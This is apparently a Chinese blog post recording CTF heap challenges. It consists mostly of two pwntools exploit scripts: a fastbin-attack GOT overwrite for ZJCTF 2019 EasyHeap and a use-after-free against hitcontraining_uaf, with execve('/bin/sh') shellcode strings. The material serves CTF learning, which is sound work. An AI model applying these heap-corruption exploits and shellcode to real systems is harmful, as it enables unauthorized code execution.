• heap做题记录


    [ZJCTF 2019]EasyHeap


    debug_str = ""
    if PIE:
    text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
    for i in addr:
    debug_str+='b *{}\n'.format(hex(text_base+i))
    gdb.attach(p,debug_str)
    else:
    for i in addr:
    debug_str+='b *{}\n'.format(hex(i))
    gdb.attach(p,debug_str)

    def dbg():
    gdb.attach(p)
    #-----------------------------------------------------------------------------------------
    s = lambda data :p.send(str(data)) #in case that data is an int
    sa = lambda delim,data :p.sendafter(str(delim), str(data))
    sl = lambda data :p.sendline(str(data))
    sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
    r = lambda numb=4096 :p.recv(numb)
    ru = lambda delims, drop=True :p.recvuntil(delims, drop)
    it = lambda :p.interactive()
    uu32 = lambda data :u32(data.ljust(4, '\0'))
    uu64 = lambda data :u64(data.ljust(8, '\0'))
    bp = lambda bkp :pdbg.bp(bkp)
    li = lambda str1,data1 :log.success(str1+'========>'+hex(data1))


    def dbgc(addr):
    gdb.attach(p,"b*" + hex(addr) +"\n c")

    def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

    sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
    #https://www.exploit-db.com/shellcodes
    #-----------------------------------------------------------------------------------------

    def choice(idx):
    sa("choice :",str(idx))

    def add(sz,context):
    choice(1)
    sa("Size of Heap : ",sz)
    # sla("Index: ",idx)
    #sla("size: ",sz)
    sa("Content of heap:",context)

    def edit(idx,sz,con):
    choice(2)
    sa("Index :",idx)
    sa("Size of Heap : ",sz)
    sa("Content of heap : ",con)

    def delete(idx):
    choice(3)
    sa("Index :",idx)


    def exp():
    add(0x60,"a")#ck0
    add(0x60,"b")#ck1
    add(0x60,"c")#ck2,split
    delete(1)#fastbin[0]->ck1->null
    edit(0,0x78,'d'*0x68+p64(0x71)+p64(0x6020AD))
    add(0x60,'e')#ck1
    add(0x60,"f"*3+p64(9999))#ck3
    p.sendline("4869")
    time.sleep(1)
    p.sendline(p64(1))
    add(0x50,"a")#ck4
    add(0x50,"b")#ck5
    add(0x50,"c")#ck6,split
    delete(5)#fastbin[0]->ck1->null
    edit(4,0x68,'d'*0x58+p64(0x61)+p64(0x601ffa))
    add(0x50,'/bin/sh\x00')#ck5
    system_addr=0x400700
    add(0x50,"f"*14+p64(system_addr))#ck3 ->got
    delete(5)

    if __name__ == '__main__':
    #raw_input()
    exp()
    p.interactive()

    hitcontraining_uaf

    from pwn import *
    import time
    context.log_level = 'debug'
    context.terminal=['tmux', 'splitw', '-h']
    prog = './hacknote'
    #elf = ELF(prog)#nc 121.36.194.21 49155

    p = process(prog,env={"LD_PRELOAD":"./libc-2.23.so"})

    libc = ELF("libc-2.23.so")
    #p = remote("node4.buuoj.cn",28453)#nc 124.71.130.185 49155
    def debug(addr,PIE=True):
    debug_str = ""
    if PIE:
    text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
    for i in addr:
    debug_str+='b *{}\n'.format(hex(text_base+i))
    gdb.attach(p,debug_str)
    else:
    for i in addr:
    debug_str+='b *{}\n'.format(hex(i))
    gdb.attach(p,debug_str)

    def dbg():
    gdb.attach(p)
    #-----------------------------------------------------------------------------------------
    s = lambda data :p.send(str(data)) #in case that data is an int
    sa = lambda delim,data :p.sendafter(str(delim), str(data))
    sl = lambda data :p.sendline(str(data))
    sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
    r = lambda numb=4096 :p.recv(numb)
    ru = lambda delims, drop=True :p.recvuntil(delims, drop)
    it = lambda :p.interactive()
    uu32 = lambda data :u32(data.ljust(4, '\0'))
    uu64 = lambda data :u64(data.ljust(8, '\0'))
    bp = lambda bkp :pdbg.bp(bkp)
    li = lambda str1,data1 :log.success(str1+'========>'+hex(data1))


    def dbgc(addr):
    gdb.attach(p,"b*" + hex(addr) +"\n c")

    def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

    sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
    #https://www.exploit-db.com/shellcodes
    #-----------------------------------------------------------------------------------------

    def choice(idx):
    sa("choice :",str(idx))

    def add(sz,context):
    choice(1)
    sa("Note size :",sz)
    # sla("Index: ",idx)
    #sla("size: ",sz)
    sa("Content :",context)

    def delete(idx):
    choice(2)
    sa("Index :",idx)

    def show(idx):
    choice(3)
    sa("Index :",idx)

    def exp():
    add(0x40,'aaaa')#H0 to give more fastbin[0],ck0,ck1
    add(0x40,'bbbb')#H1 to give more fastbin[0],ck2,ck3
    delete(0)
    delete(1)
    raw_input()
    backdoor_addr=0x8048945
    add(8,p32(backdoor_addr))
    show(0)


    if __name__ == '__main__':
    #raw_input()
    exp()
    p.interactive()

  • 相关阅读:
    IMP-00009: 导出文件异常结束
    Unknown collation: 'utf8mb4_unicode_ci'
    从 github 执行 git clone 一个大的项目时提示 error: RPC failed
    PHP 中获取当前时间[Datetime Now]
    wordpress 常用函数 checked(),selected(),disabled()
    github 有名的问题【ERROR: Permission to .git denied to user】
    SSH 基础
    mixed content 混合内容
    nginx gzip 模块配置
    markdown 书写表格
  • 原文地址:https://www.cnblogs.com/cnnnnnn/p/15823646.html
Copyright © 2020-2023  润新知